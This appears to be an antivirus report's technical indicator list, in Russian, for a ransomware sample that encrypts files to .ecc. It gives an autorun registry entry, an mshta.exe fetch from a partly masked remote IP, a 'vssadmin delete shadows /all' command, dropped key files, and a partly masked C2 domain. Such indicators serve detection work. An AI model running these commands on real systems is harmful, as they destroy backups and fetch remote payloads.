Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'crypto13' = '%APPDATA%\etuyafl.exe'
- '%APPDATA%\etuyafl.exe'
- '<SYSTEM32>\mshta.exe' "http://50.#.138.132/?Su#######################################################################################################"
- '<SYSTEM32>\vssadmin.exe' delete shadows /all
- <SYSTEM32>\cmd.exe
- ecmd.exe
- %APPDATA%\log.html
- %APPDATA%\key.dat
- %APPDATA%\etuyafl.exe
- %WINDIR%\$NtUninstallWIC$\spuninst\spuninst.txt в %WINDIR%\$NtUninstallWIC$\spuninst\spuninst.txt.ecc
- %WINDIR%\$NtUninstallKB942288-v3$\spuninst\spuninst.txt в %WINDIR%\$NtUninstallKB942288-v3$\spuninst\spuninst.txt.ecc
- '50.#.138.132':80
- '7t######47vlep5o.2kjb7.net':80
- 'localhost':1038
- 50.#.138.132/?Su#######################################################################################################
- 7t######47vlep5o.2kjb7.net/state.php?U3######################################################################################################################################################################################################################################################################
- DNS ASK 7t######47vlep5o.2kjb7.net
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'Indicator' WindowName: ''